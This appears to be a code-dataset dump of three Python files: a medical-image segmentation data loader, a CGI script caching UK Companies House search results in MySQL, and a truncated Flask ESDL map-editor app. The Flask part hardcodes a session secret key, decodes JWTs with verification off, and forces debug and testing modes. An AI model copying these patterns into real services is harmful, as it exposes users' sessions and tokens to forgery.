source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
seg_data_loader_onfly.py
|
from __future__ import print_function, division
import blosc
import torch
from torch.utils.data import Dataset
from data_pre.seg_data_utils import *
from data_pre.transform import Transform
import SimpleITK as sitk
from multiprocessing import *
blosc.set_nthreads(1)
import progressbar as pb
from copy import deepcopy
import random
import time
class SegmentationDataset(Dataset):
"""segmentation dataset.
if the data are loaded into memory, we provide data processing option like image resampling and label filtering
if not, for efficiency, we assume the data are preprocessed and the image resampling still works but the label filtering are disabled
"""
def __init__(self, data_path,phase, transform=None, option = None):
"""
:param data_path: string, path to processed data
:param transform: function, apply transform on data
"""
self.data_path = data_path
self.phase = phase
self.transform = transform
ind = ['train', 'val', 'test', 'debug'].index(phase)
max_num_for_loading=option['max_num_for_loading',(-1,-1,-1,-1),"the max number of pairs to be loaded, set -1 if there is no constraint,[max_train, max_val, max_test, max_debug]"]
self.max_num_for_loading = max_num_for_loading[ind]
self.has_label = False
self.get_file_list()
self.seg_option = option['seg']
self.img_after_resize = option[('img_after_resize', [-1, -1, -1], "numpy coordinate, resample the image into desired size")]
self.normalize_via_percentage_clip = option[('normalize_via_percentage_clip',-1,"normalize the image via percentage clip, the given value is in [0-1]")]
self.normalize_via_range_clip = option[('normalize_via_range_clip',(-1,-1),"normalize the image via range clip")]
self.img_after_resize = None if any([sz == -1 for sz in self.img_after_resize]) else self.img_after_resize
self.patch_size = self.seg_option['patch_size']
self.interested_label_list = self.seg_option['interested_label_list',[-1],"the label to be evaluated, the label not in list will be turned into 0 (background)"]
self.interested_label_list = None if any([label == -1 for label in self.interested_label_list]) else self.interested_label_list
self.transform_name_seq = self.seg_option['transform']['transform_seq']
self.option_p = self.seg_option[('partition', {}, "settings for the partition")]
self.use_whole_img_as_input = self.seg_option[('use_whole_img_as_input',False,"use whole image as the input")]
self.load_into_memory = True
self.img_list = []
self.img_sz_list = []
self.original_spacing_list = []
self.original_sz_list = []
self.spacing_list = []
self.label_org_index_list = []
self.label_converted_index_list = []
self.label_density_list = []
if self.load_into_memory:
self.init_img_pool()
print('img pool initialized complete')
if self.phase=='train':
self.init_corr_transform_pool()
print('transforms initialized complete')
else:
self.init_corr_partition_pool()
print("partition pool initialized complete")
blosc.set_nthreads(1)
def get_file_list(self):
"""
get the all files belonging to data_type from the data_path,
:return: full file path list, file name list
"""
if not os.path.exists(self.data_path):
self.path_list = []
self.name_list = []
self.init_weight_list = []
return
self.path_list = read_txt_into_list(os.path.join(self.data_path, 'file_path_list.txt'))
if len(self.path_list[0]) == 2:
self.has_label = True
elif self.phase in ["train", "val", "debug"]:
raise ValueError("the label must be provided during training")
if not self.has_label:
self.path_list= [[path] for path in self.path_list]
file_name_path = os.path.join(self.data_path, 'file_name_list.txt')
if os.path.isfile(file_name_path):
self.name_list = read_txt_into_list(file_name_path)
else:
self.name_list = [get_file_name(self.path_list[i][0]) for i in range(len(self.path_list))]
if self.max_num_for_loading>0:
read_num = min(self.max_num_for_loading, len(self.path_list))
if self.phase=='train':
index =list(range(len(self.path_list)))
random.shuffle(index)
self.path_list = [self.path_list[ind] for ind in index ]
self.name_list = [self.name_list[ind] for ind in index ]
self.path_list = self.path_list[:read_num]
self.name_list = self.name_list[:read_num]
# if len(self.name_list)==0:
# self.name_list = ['img_{}'.format(idx) for idx in range(len(self.path_list))]
self.num_img = len(self.name_list)
def __read_img_label_into_zipnp(self,img_label_path_dic,img_label_dic):
pbar = pb.ProgressBar(widgets=[pb.Percentage(), pb.Bar(), pb.ETA()], maxval=len(img_label_path_dic)).start()
count = 0
for fn, img_label_path in img_label_path_dic.items():
img_label_np_dic = {}
img_sitk, original_spacing, original_sz = self.__read_and_clean_itk_info(img_label_path['image'])
resized_img, resize_factor = self.resize_img(img_sitk)
img_np = sitk.GetArrayFromImage(resized_img)
img_np = self.normalize_intensity(img_np)
img_label_np_dic['image'] = blosc.pack_array(img_np.astype(np.float32))
if self.has_label:
label_sitk, _, _ = self.__read_and_clean_itk_info(img_label_path['label'])
resized_label,_ = self.resize_img(label_sitk,is_label=True)
label_np = sitk.GetArrayFromImage(resized_label)
label_index = list(np.unique(label_np))
img_label_np_dic['label'] = blosc.pack_array(label_np.astype(np.int64))
img_label_np_dic['label_index'] = label_index
img_after_resize = self.img_after_resize if self.img_after_resize is not None else original_sz
new_spacing= original_spacing*(original_sz-1)/(np.array(img_after_resize)-1)
normalized_spacing = self._normalize_spacing(new_spacing,img_after_resize, silent_mode=True)
img_label_np_dic['original_sz'] =original_sz
img_label_np_dic['original_spacing'] = original_spacing
img_label_np_dic['spacing'] = normalized_spacing
img_label_np_dic['img_sz'] = list(img_np.shape)
img_label_dic[fn] =img_label_np_dic
count +=1
pbar.update(count)
pbar.finish()
def _normalize_spacing(self,spacing,sz,silent_mode=False):
"""
Normalizes spacing.
:param spacing: Vector with spacing info, in XxYxZ format
:param sz: size vector in XxYxZ format
:return: vector with normalized spacings in XxYxZ format
"""
dim = len(spacing)
# first determine the largest extent
current_largest_extent = -1
extent = np.zeros_like(spacing)
for d in range(dim):
current_extent = spacing[d]*(sz[d]-1)
extent[d] = current_extent
if current_extent>current_largest_extent:
current_largest_extent = current_extent
scalingFactor = 1./current_largest_extent
normalized_spacing = spacing*scalingFactor
normalized_extent = extent*scalingFactor
if not silent_mode:
print('Normalize spacing: ' + str(spacing) + ' -> ' + str(normalized_spacing))
print('Normalize spacing, extent: ' + str(extent) + ' -> ' + str(normalized_extent))
return normalized_spacing
def __convert_to_standard_label_map(self, label_map, interested_label_list):
label_map =blosc.unpack_array(label_map)
cur_label_list = list(np.unique(label_map)) # unique func orders the elements
if set(cur_label_list) == set(interested_label_list):
return label_map
for l_id in cur_label_list:
if l_id in interested_label_list:
st_index = interested_label_list.index(l_id)
else:
# assume background label is 0
st_index = 0
print("warning label: {} is not in interested label index, and would be convert to 0".format(l_id))
label_map[np.where(label_map == l_id)] = st_index
return label_map
def __get_clean_label(self,img_label_dict, img_name_list):
"""
:param img_label_dict:
:param img_name_list:
:return:
"""
print(" Attention, the annotation for background is assume to be 0 ! ")
print(" Attention, we are using the union set of the label! ")
if self.interested_label_list is None:
interested_label_set = set()
for i, fname in enumerate(img_name_list):
label_set = img_label_dict[fname]['label_index']
if i ==0:
interested_label_set = set(label_set)
else:
interested_label_set = interested_label_set.union(label_set)
interested_label_list = list(interested_label_set)
else:
interested_label_list = self.interested_label_list
#self.standard_label_index = tuple([int(item) for item in interested_label_list])
for fname in img_name_list:
label = img_label_dict[fname]['label']
label = self.__convert_to_standard_label_map(label, interested_label_list)
label_density = list(np.bincount(label.reshape(-1).astype(np.int32)) / len(label.reshape(-1)))
img_label_dict[fname]['label'] = blosc.pack_array(label)
img_label_dict[fname]['label_density']=label_density
img_label_dict[fname]['label_org_index'] = interested_label_list
img_label_dict[fname]['label_converted_index'] = list(range(len(interested_label_list)))
return img_label_dict
def init_img_pool(self):
"""img pool shoudl include following thing:
img_label_path_dic:{img_name:{'image':img_fp,'label':label_fp,...}
img_label_dic: {img_name:{'image':img_np,'label':label_np},......}
img_list [[s_np,t_np,sl_np,tl_np],....]
only the img_list need to be used by get_item method
"""
use_parallel = self.phase=='train'
if use_parallel:
manager = Manager()
img_label_dic = manager.dict()
img_label_path_dic = {}
img_name_list = []
for i,fps in enumerate(self.path_list):
fn = self.name_list[i]
if fn not in img_label_path_dic:
if self.has_label:
img_label_path_dic[fn] = {'image':fps[0], 'label':fps[1]}
else:
img_label_path_dic[fn] = {'image':fps[0]}
img_name_list.append(fn)
num_of_workers = 4
num_of_workers = num_of_workers if len(self.name_list)>12 else 2
split_dict = self.__split_dict(img_label_path_dic,num_of_workers)
procs =[]
for i in range(num_of_workers):
p = Process(target=self.__read_img_label_into_zipnp,args=(split_dict[i], img_label_dic,))
p.start()
print("pid:{} start:".format(p.pid))
procs.append(p)
for p in procs:
p.join()
print("the loading phase finished, total {} img and labels have been loaded".format(len(img_label_dic)))
img_label_dic=dict(img_label_dic) # todo uncomment manager.dict
else:
img_label_dic=dict()
img_label_path_dic = {}
img_name_list = []
for i,fps in enumerate(self.path_list):
fn = self.name_list[i]
if fn not in img_label_path_dic:
if self.has_label:
img_label_path_dic[fn] = {'image': fps[0], 'label': fps[1]}
else:
img_label_path_dic[fn] = {'image': fps[0]}
img_name_list.append(fn)
self.__read_img_label_into_zipnp(img_label_path_dic, img_label_dic) #todo dels
self.get_organize_structure(img_label_dic,img_name_list)
def get_organize_structure(self, img_label_dic, img_name_list):
if self.has_label:
img_label_dic = self.__get_clean_label(img_label_dic, img_name_list)
for fname in img_name_list:
if self.has_label:
self.img_list.append([img_label_dic[fname]['image'],
img_label_dic[fname]['label']])
else:
self.img_list.append([img_label_dic[fname]['image']])
self.img_sz_list.append(img_label_dic[fname]['img_sz'])
self.original_spacing_list.append(img_label_dic[fname]['original_spacing'])
self.original_sz_list.append(img_label_dic[fname]['original_sz'])
self.spacing_list.append(img_label_dic[fname]['spacing'])
if self.has_label:
self.label_org_index_list.append(img_label_dic[fname]['label_org_index'])
self.label_converted_index_list.append(img_label_dic[fname]['label_converted_index'])
self.label_density_list.append(img_label_dic[fname]['label_density'])
# self.img_list = np.array(self.img_list)
# self.img_sz_list = np.array(self.img_sz_list)
# self.original_spacing_list = np.array(self.original_spacing_list)
# self.original_sz_list = np.array(self.original_sz_list)
# self.spacing_list = np.array(self.spacing_list)
# self.label_org_index_list = np.array(self.label_org_index_list)
# self.label_converted_index_list = np.array(self.label_converted_index_list)
# self.label_density_list = np.array(self.label_density_list)
def resize_img(self, img, is_label=False):
"""
:param img: sitk input, factor is the outputs_ize/patched_sized
:return:
"""
img_sz = img.GetSize()
if self.img_after_resize is not None:
img_after_resize = self.img_after_resize
else:
img_after_resize = np.flipud(img_sz)
resize_factor = np.array(img_after_resize) / np.flipud(img_sz)
resize = not all([factor == 1 for factor in resize_factor])
if resize:
resampler = sitk.ResampleImageFilter()
dimension = 3
factor = np.flipud(resize_factor)
affine = sitk.AffineTransform(dimension)
matrix = np.array(affine.GetMatrix()).reshape((dimension, dimension))
after_size = [round(img_sz[i] * factor[i]) for i in range(dimension)]
after_size = [int(sz) for sz in after_size]
matrix[0, 0] = 1. / factor[0]
matrix[1, 1] = 1. / factor[1]
matrix[2, 2] = 1. / factor[2]
affine.SetMatrix(matrix.ravel())
resampler.SetSize(after_size)
resampler.SetTransform(affine)
if is_label:
resampler.SetInterpolator(sitk.sitkNearestNeighbor)
else:
resampler.SetInterpolator(sitk.sitkBSpline)
img_resampled = resampler.Execute(img)
else:
img_resampled = img
return img_resampled, resize_factor
def normalize_intensity(self, img):
"""
a numpy image, normalize into intensity [-1,1]
(img-img.min())/(img.max() - img.min())
:param img: image
:param percen_clip: Linearly normalized image intensities so that the 95-th percentile gets mapped to 0.95; 0 stays 0
:param range_clip: Linearly normalized image intensities from (range_clip[0], range_clip[1]) to 0,1
:return
"""
if self.normalize_via_percentage_clip>0:
img = img - img.min()
normalized_img = img / np.percentile(img, 95) * 0.95
else:
range_clip = self.normalize_via_range_clip
if range_clip[0]<range_clip[1]:
img = np.clip(img,a_min=range_clip[0], a_max=range_clip[1])
min_intensity = img.min()
max_intensity = img.max()
normalized_img = (img - img.min()) / (max_intensity - min_intensity)
normalized_img = normalized_img * 2 - 1
return normalized_img
def __read_and_clean_itk_info(self, path):
if path is not None:
img = sitk.ReadImage(path)
spacing_sitk = img.GetSpacing()
img_sz_sitk = img.GetSize()
return sitk.GetImageFromArray(sitk.GetArrayFromImage(img)), np.flipud(spacing_sitk), np.flipud(img_sz_sitk)
else:
return None, None, None
def __read_itk_into_np(self, path):
return sitk.GetArrayFromImage(sitk.ReadImage(path))
def __split_dict(self, dict_to_split, split_num):
index_list = list(range(len(dict_to_split)))
index_split = np.array_split(np.array(index_list), split_num)
split_dict = []
dict_to_split_items = list(dict_to_split.items())
for i in range(split_num):
dj = dict(dict_to_split_items[index_split[i][0]:index_split[i][-1] + 1])
split_dict.append(dj)
return split_dict
def __convert_np_to_itk_coord(self,coord_list):
return list(np.flipud(np.array(coord_list)))
def get_transform_seq(self,i):
option_trans = deepcopy(self.seg_option['transform'])
option_trans['shared_info']['label_list'] = self.label_converted_index_list[i]
option_trans['shared_info']['label_density'] = self.label_density_list[i]
option_trans['shared_info']['img_size'] = self.__convert_np_to_itk_coord(self.img_sz_list[i])
option_trans['shared_info']['num_crop_per_class_per_train_img'] = self.seg_option['num_crop_per_class_per_train_img']
option_trans['my_bal_rand_crop']['scale_ratio'] = self.seg_option['transform']['my_bal_rand_crop']['scale_ratio']
option_trans['patch_size'] = self.__convert_np_to_itk_coord(self.seg_option['patch_size'])
transform = Transform(option_trans)
return transform.get_transform_seq(self.transform_name_seq)
def apply_transform(self,sample, transform_seq, rand_label_id=-1):
for transform in transform_seq:
sample = transform(sample, rand_label_id)
return sample
def init_corr_transform_pool(self):
self.corr_transform_pool = [self.get_transform_seq(i) for i in range(self.num_img)]
def init_corr_partition_pool(self):
from data_pre.partition import partition
patch_sz_itk =self.__convert_np_to_itk_coord(self.seg_option['patch_size'])
overlap_sz_itk =self.__convert_np_to_itk_coord(self.option_p['overlap_size'])
self.corr_partition_pool = [deepcopy(partition(self.option_p,patch_sz_itk,overlap_sz_itk)) for _ in range(self.num_img)]
def __len__(self):
if self.phase == "train":
if not self.use_whole_img_as_input:
return len(self.name_list)*1000
else:
return len(self.name_list)
else:
return len(self.name_list)
def __getitem__(self, idx):
"""
:param idx: id of the items
:return: the processed data, return as type of dic
"""
random_state = np.random.RandomState(int(time.time()))
rand_label_id =random_state.randint(0,1000)+idx
idx = idx%self.num_img
filename = self.name_list[idx]
zipnp_list = self.img_list[idx]
spacing = self.spacing_list[idx]
original_spacing = self.original_spacing_list[idx]
original_sz = self.original_sz_list[idx]
if self.has_label:
img_np, label_np = [blosc.unpack_array(item) for item in zipnp_list]
else:
img_np = blosc.unpack_array(zipnp_list[0])
img_path = self.path_list[idx]
img_shape = img_np.shape
if self.phase=="train":
sample = {'image': [img_np], 'label': label_np} # here the list is for multi-modality , each mode is an elem in list
sample = self.apply_transform(sample,self.corr_transform_pool[idx],rand_label_id)
else:
if not self.has_label:
sample = {'image': [img_np]}
else:
sample = {'image': [img_np], 'label':label_np}
if not self.use_whole_img_as_input:
sample = self.corr_partition_pool[idx](sample)
else:
sample['image'] = np.stack(sample['image'], 0)
sample['image'] = np.stack(sample['image'], 0)
sample['img_path'] = img_path
if self.transform:
sample['image'] = self.transform(sample['image'])
if self.has_label:
sample['label'] = self.transform(sample['label'])
sample['spacing'] = spacing.copy()
sample["image_after_resize"] =np.array(img_shape)
sample['original_sz'] = original_sz.copy()
sample['original_spacing'] = original_spacing.copy()
return sample, filename
class ToTensor(object):
"""Convert ndarrays in sample to Tensors."""
def __call__(self, sample):
n_tensor = torch.from_numpy(sample)
return n_tensor
|
index.py
|
#!/usr/bin/pypy3
#!/usr/bin/python3
from http.client import HTTPSConnection
from base64 import b64encode
import json
import mysql.connector
from datetime import datetime, timedelta
from threading import Thread
import cgi
class ukcompanieshouse:
URL = 'api.companieshouse.gov.uk'
KEY = ''
def __init__(self):
basic_auth = b64encode((self.KEY+':').encode(encoding='ascii', errors='ignore')).decode("ascii")
self.headers = {'Authorization' : 'Basic {}'.format(basic_auth)}
def api(self, req):
c = HTTPSConnection(self.URL)
c.request('GET', req, headers=self.headers)
return c.getresponse().read().decode('utf-8', errors='ignore')
def search(self, keyword):
res = self.api('/search/companies?q={}&items_per_page=10'.format(keyword.replace(' ', '%20')))
results = [[company['title'],company['company_number']] for company in json.loads(res)['items']]
return results
def filing_history(self, company_number):
res = self.api('/company/{}/filing-history'.format(company_number))
results = json.loads(res)
if 'items' in results:
return results['items']
else:
return {}
def officers(self, company_number):
res = self.api('/company/{}/officers'.format(company_number))
results = json.loads(res)
if 'items' in results:
return results['items']
else:
return {}
def persons_with_significant_control(self, company_number):
res = self.api('/company/{}/persons-with-significant-control'.format(company_number))
results = json.loads(res)
if 'items' in results:
return results['items']
else:
return {}
def exemptions(self, company_number):
res = self.api('/company/{}/exemptions'.format(company_number))
results = json.loads(res)
if 'exemptions' in results:
return results['exemptions']
else:
return {}
def registers(self, company_number):
res = self.api('/company/{}/registers'.format(company_number))
results = json.loads(res)
if 'error' in results:
return {}
else:
return results
def company_profile(self, company_number, recursive=True):
res = self.api('/company/{}'.format(company_number))
results = json.loads(res)
for r in results:
if results[r] == False:
results[r] = 'No'
elif results[r] == True:
results[r] = 'Yes'
if recursive:
results['links']['filing_history'] = self.filing_history(company_number)
results['links']['officers'] = self.officers(company_number)
results['links']['persons_with_significant_control'] = self.persons_with_significant_control(company_number)
results['links']['exemptions'] = self.exemptions(company_number)
results['links']['registers'] = self.registers(company_number)
return {'results': results}
def commit(keyword, results, cursor, cnx):
sql1 = "DELETE FROM ukcompanieshousesearch WHERE keyword=%s;"
sql2 = "INSERT INTO ukcompanieshousesearch VALUES(%s, %s, %s);"
val = (
keyword,
results,
str(datetime.now()))
cursor.execute(sql1, (keyword,))
cnx.commit()
cursor.execute(sql2, val)
cnx.commit()
cursor.close()
cnx.close()
def expected(dump):
return True
def main():
form = cgi.FieldStorage()
keyword = str(form['keyword'].value)
cnx = mysql.connector.connect(user='api', database='projectapi')
cursor = cnx.cursor(buffered=True)
sql = "SELECT * FROM ukcompanieshousesearch WHERE keyword=%s;"
cursor.execute(sql, (keyword,))
cache_results = ''
cache_expired = False
fetch_results = ''
results = ''
try:
data = list(cursor.fetchall()[0])
if (datetime.now()-timedelta(days=30)) > data[2]:
raise IndexError('item in database expired')
cache_results = data[1]
cursor.close()
cnx.close()
except:
cache_expired = True
company = ukcompanieshouse()
fetch_results = json.dumps(company.search(keyword))
finally:
if not cache_expired:
results = cache_results
elif expected(fetch_results):
t1 = Thread(target=commit, args=(keyword, fetch_results, cursor, cnx,))
t1.start()
results = fetch_results
elif cache_expired:
results = cache_results
else:
results = json.dumps({'error':'api access problem'})
return results
if __name__ == '__main__':
print('Content-type:application/json', end='\r\n\r\n')
print(main().encode(encoding='UTF-8',errors='ignore').decode(), end='')
|
app.py
|
#!/usr/bin/env python
# This work is based on original code developed and copyrighted by TNO 2020.
# Subsequent contributions are licensed to you by the developers of such code and are
# made available to the Project under one or several contributor license agreements.
#
# This work is licensed to you under the Apache License, Version 2.0.
# You may obtain a copy of the license at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Contributors:
# TNO - Initial implementation
# Manager:
# TNO
import importlib
import json
import urllib
import uuid
import traceback
from datetime import datetime
from pprint import pprint
from warnings import warn
import jwt
import requests
from flask import Flask, Response, redirect, render_template, request, send_from_directory, session
from flask_executor import Executor
from flask_oidc import OpenIDConnect
from flask_session import Session
from flask_socketio import SocketIO, emit
from pyecore.ecore import EDate
import src.esdl_config as esdl_config
import src.settings as settings
from esdl import esdl
from esdl.esdl_handler import EnergySystemHandler
from esdl.processing import ESDLAsset, ESDLEcore, ESDLEnergySystem, ESDLGeometry, ESDLQuantityAndUnits
from esdl.processing.ESDLAsset import get_asset_capability_type
from esdl.processing.EcoreDocumentation import EcoreDocumentation
from extensions.bag import BAG
from extensions.boundary_service import BoundaryService
from extensions.es_statistics import ESStatisticsService
from extensions.esdl_api import ESDL_API
from extensions.esdl_browser import ESDLBrowser
from extensions.esdl_compare import ESDLCompare
from extensions.esdl_drive import ESDLDrive
from extensions.esdl_merge import ESDLMerge
from extensions.essim import ESSIM
from extensions.essim_sensitivity import ESSIMSensitivity
from extensions.etm_local import ETMLocal
from extensions.heatnetwork import HeatNetwork
from extensions.ibis import IBISBedrijventerreinen
from extensions.ielgas import IELGAS
from extensions.mapeditor_settings import MAPEDITOR_UI_SETTINGS, MapEditorSettings
from extensions.pico_rooftoppv_potential import PICORooftopPVPotential
from extensions.port_profile_viewer import PortProfileViewer
from extensions.profiles import Profiles
from extensions.session_manager import del_session, delete_sessions_on_disk, get_handler, get_session, \
get_session_for_esid, schedule_session_clean_up, set_handler, set_session, set_session_for_esid, valid_session
from extensions.settings_storage import SettingsStorage
from extensions.shapefile_converter import ShapefileConverter
from extensions.spatial_operations import SpatialOperations
from extensions.time_dimension import TimeDimension
# from extensions.vesta import Vesta
from extensions.workflow import Workflow
from src.asset_draw_toolbar import AssetDrawToolbar
from src.assets_to_be_added import AssetsToBeAdded
from src.datalayer_api import DataLayerAPI
from src.edr_assets import EDRAssets
from src.esdl2shapefile import ESDL2Shapefile
from src.esdl_helper import asset_state_to_ui, generate_profile_info, get_asset_and_coord_from_port_id, \
get_asset_from_port_id, get_connected_to_info, get_port_profile_info, get_tooltip_asset_attrs, \
update_carrier_conn_list, add_spatial_attributes
from src.esdl_services import ESDLServices
from src.essim_kpis import ESSIM_KPIs
from src.essim_validation import validate_ESSIM
from src.log import get_logger
from src.process_es_area_bld import get_building_information, process_energy_system
from src.user_logging import UserLogging
from src.version import __long_version__ as mapeditor_version
from src.view_modes import ViewModes
from src.wms_layers import WMSLayers
from src.table_editor import TableEditor
from src.esdl_file_io import ESDLFileIO
from src.release_notes import ReleaseNotes
from utils.datetime_utils import parse_date
print('MapEditor version {}'.format(mapeditor_version))
logger = get_logger(__name__)
if settings.USE_GEVENT:
import gevent.monkey
gevent.monkey.patch_all()
logger.info("Using GEvent")
#TODO fix send_file in uwsgi
# debugging with pycharm:
#https://stackoverflow.com/questions/21257568/debugging-a-uwsgi-python-application-using-pycharm/25822477
user_actions_logging = UserLogging()
if settings.settings_storage_config["host"] is None or settings.settings_storage_config["host"] == "":
logger.error("Settings storage is not configured. Aborting...")
exit(1)
settings_storage = SettingsStorage(database_uri='mongodb://' + settings.settings_storage_config["host"] + ':' + settings.settings_storage_config["port"])
wms_layers = WMSLayers(settings_storage)
# handler to retrieve ESDL documentation
esdl_doc = EcoreDocumentation(esdlEcoreFile="esdl/esdl.ecore")
def is_running_in_uwsgi():
try:
import uwsgi
a = uwsgi.opt
logger.info("uWSGI startup options: {}".format(a))
return True
except Exception:
return False
# ---------------------------------------------------------------------------------------------------------------------
# Application definition, configuration and setup of simple file server
# ---------------------------------------------------------------------------------------------------------------------
app = Flask(__name__)
app.config['SECRET_KEY'] = b'\xc3g\x19\xbf\x8e\xa0\xe7\xc8\x9a/\xae%\x04g\xbe\x9f\xaex\xb5\x8c\x81f\xaf`' #os.urandom(24) #'secret!'
app.config['SESSION_COOKIE_NAME'] = 'ESDL-WebEditor-session'
app.config['SESSION_COOKIE_SAMESITE'] = 'Lax'
# app.config['SESSION_COOKIE_SECURE'] = True
app.config['SESSION_PERMANENT'] = True
app.config['SESSION_TYPE'] = 'filesystem'
app.config['PERMANENT_SESSION_LIFETIME'] = 60*60*24 # 1 day in seconds
app.config['SESSION_FILE_DIR'] = '/tmp/flask_session'
app.config['EXECUTOR_PROPAGATE_EXCEPTIONS'] = True # make sure errors are logged for tasks run in threads
logger.info("Socket.IO Async mode: {}".format(settings.ASYNC_MODE))
logger.info('Running inside uWSGI: {}'.format(is_running_in_uwsgi()))
socketio = SocketIO(app, async_mode=settings.ASYNC_MODE, manage_session=False, path='/socket.io', logger=settings.FLASK_DEBUG)
# logging.getLogger('engineio').setLevel(logging.WARNING) # don't print all the messages
# remove existing sessions when restarting, existing sessions will give errors
# as associated ESDLs are not stored in the session and the OpenId connect info is wrong
delete_sessions_on_disk(app.config['SESSION_FILE_DIR'])
# fix sessions with socket.io. see: https://blog.miguelgrinberg.com/post/flask-socketio-and-the-user-session
Session(app)
executor = Executor(app)
#extensions
schedule_session_clean_up()
HeatNetwork(app, socketio)
IBISBedrijventerreinen(app, socketio)
ESDLBrowser(app, socketio, esdl_doc)
BAG(app, socketio)
BoundaryService(app, socketio, settings_storage)
esdl_api = ESDL_API(app, socketio)
ESDLCompare(app, socketio)
ESDLMerge(app, socketio, executor)
essim_kpis = ESSIM_KPIs(app, socketio)
essim = ESSIM(app, socketio, executor, essim_kpis, settings_storage)
ESSIMSensitivity(app, socketio, settings_storage, essim)
# Vesta(app, socketio, settings_storage)
Workflow(app, socketio, settings_storage)
ESStatisticsService(app, socketio)
MapEditorSettings(app, socketio, settings_storage)
profiles = Profiles(app, socketio, executor, settings_storage)
ESDLDrive(app, socketio, executor)
ShapefileConverter(app, socketio, executor)
time_dimension = TimeDimension(app, socketio, executor, settings_storage)
IELGAS(app, socketio, settings_storage)
ETMLocal(app, socketio, settings_storage)
PortProfileViewer(app, socketio, settings_storage)
esdl_services = ESDLServices(app, socketio, settings_storage)
PICORooftopPVPotential(app, socketio)
SpatialOperations(app, socketio)
DataLayerAPI(app, socketio, esdl_doc)
ViewModes(app, socketio, settings_storage)
edr_assets = EDRAssets(app, socketio, settings_storage)
AssetsToBeAdded(app, socketio)
AssetDrawToolbar(app, socketio, settings_storage)
TableEditor(app, socketio, esdl_doc, settings_storage)
ESDLFileIO(app, socketio, executor)
ReleaseNotes(app, socketio, settings_storage)
ESDL2Shapefile(app)
#TODO: check secret key with itsdangerous error and testing and debug here
app.config.update({
'TESTING': True,
'DEBUG': True,
'OIDC_ID_TOKEN_COOKIE_SECURE': False,
'OIDC_REQUIRE_VERIFIED_EMAIL': False,
'OIDC_USER_INFO_ENABLED': True,
'OIDC_OPENID_REALM': 'esdl-mapeditor',
'OIDC_SCOPES': ['openid', 'email', 'profile', 'groups', 'microprofile-jwt'],
'OIDC_INTROSPECTION_AUTH_METHOD': 'client_secret_post',
'OIDC_CLIENT_SECRETS': settings.OIDC_CLIENT_SECRETS
})
try:
oidc = OpenIDConnect(app)
except Exception as e:
logger.exception("Something went wrong when connecting to Keycloak")
import sys
sys.exit(1)
# TEMPORARY SOLUTION TO DISABLE BROWSER CACHING DURING TESTING
@app.after_request
def add_header(r: Response):
"""
Add headers to both force latest IE rendering engine or Chrome Frame,
and also to cache the rendered page for 10 minutes.
"""
if r.content_type == 'image/png': # images are allowed to be cached.
return r
if settings.FLASK_DEBUG: # only prevent caching when debugging
r.headers["Pragma"] = "no-cache"
r.headers["Expires"] = "0"
r.headers['Cache-Control'] = 'public, max-age=0'
return r
@app.before_request
def before_request():
# store session id
session['client_id'] = request.cookies.get(app.config['SESSION_COOKIE_NAME']) # get cookie id
@app.route('/')
def index():
store_enabled = settings.esdl_store_config or settings.mondaine_hub_config
return render_template('index.html', store_enabled=store_enabled)
"""
# test for OpenID connect authentication against KeyCloak
@app.route('/test')
@oidc.require_login
def test_authentication():
if oidc.user_loggedin:
user_email = oidc.user_getfield('email')
user_groups = oidc.user_getfield('user_group')
logger.debug('user: {}, user groups: {}'.format(user_email, user_groups))
whole_token = oidc.get_access_token()
if whole_token:
jwt_tkn = jwt.decode(whole_token, key=settings.IDM_PUBLIC_KEY, algorithms='RS256', audience='account',
verify=True)
pprint(jwt_tkn)
return jwt_tkn
else:
return "Hello world!"
else:
return "Not logged in"
"""
@app.route('/editor')
@oidc.require_login
def editor():
#session['client_id'] = request.cookies.get(app.config['SESSION_COOKIE_NAME']) # get cookie id
#set_session('client_id', session['client_id'])
logger.info('client_id is set to %s' % session['client_id'])
if oidc.user_loggedin:
if session['client_id'] == None:
warn('WARNING: No client_id in session!!')
whole_token = oidc.get_access_token()
logger.debug(f"whole_token: {whole_token}")
if whole_token:
try:
jwt_tkn = jwt.decode(whole_token, algorithms='RS256', verify=False)
pprint(jwt_tkn)
except Exception as e:
logger.exception(f"error in decoding token: {str(e)}")
# if role in access_token['resource_access'][client]['roles']:
user_email = oidc.user_getfield('email')
logger.info("************* USER LOGIN (" + user_email + ") at " + str(datetime.now()))
user_actions_logging.store_logging(user_email, "login", "", "", "", {})
userinfo = oidc.user_getinfo(['role'])
role = []
if 'role' in userinfo:
role = userinfo['role'].split(',')
# find roles in for the mapeditor client
mapeditor_role = []
client = oidc.client_secrets.get('client_id')
resource_access = oidc.user_getfield('resource_access')
if resource_access is not None and client in resource_access:
if 'roles' in resource_access[client]:
mapeditor_role = resource_access[client]['roles']
set_session('user-group', oidc.user_getfield('user_group'))
set_session('user-role', role)
set_session('user-email', user_email)
set_session('user-mapeditor-role', mapeditor_role)
set_session('jwt-token', whole_token)
user_fullname = oidc.user_getfield('name')
set_session('user-fullname', user_fullname)
esdl_store_enabled = not(settings.esdl_store_config["hostname"] is None or settings.esdl_store_config["hostname"] == "")
mondaine_hub_enabled = not(settings.mondaine_hub_config["hostname"] is None or settings.mondaine_hub_config["hostname"] == "")
store_enabled = esdl_store_enabled or mondaine_hub_enabled
esdl_drive_enabled = not(settings.esdl_drive_config["hostname"] is None or settings.esdl_drive_config["hostname"] == "")
edr_enabled = not(settings.edr_config["host"] is None or settings.edr_config["host"] == "")
essim_enabled = not(settings.essim_config["ESSIM_host"] is None or settings.essim_config["ESSIM_host"] == "")
boundary_service_enabled = not(settings.boundaries_config["host"] is None or settings.boundaries_config["host"] == "")
statistics_service_enabled = not(settings.statistics_settings_config["host"] is None or settings.statistics_settings_config["host"] == "")
bag_service_enabled = not(settings.bag_config["host"] is None or settings.bag_config["host"] == "")
ibis_service_enabled = not(settings.ibis_config["host"] is None or settings.ibis_config["host"] == "")
logger.info("store:{} drive:{} edr:{} bound:{} stat:{} bag:{} ibis:{}".format(store_enabled, esdl_drive_enabled,
edr_enabled, boundary_service_enabled, statistics_service_enabled,bag_service_enabled, ibis_service_enabled))
return render_template('editor.html',async_mode=socketio.async_mode,
role=role,
store_enabled=store_enabled,
esdl_drive_enabled=esdl_drive_enabled,
edr_enabled=edr_enabled,
essim_enabled=essim_enabled,
boundary_service_enabled=boundary_service_enabled,
statistics_service_enabled=statistics_service_enabled,
bag_service_enabled=bag_service_enabled,
ibis_service_enabled=ibis_service_enabled,
debug=settings.FLASK_DEBUG,
version=mapeditor_version
)
else:
return render_template('index.html')
# to enable working offline without IDM:
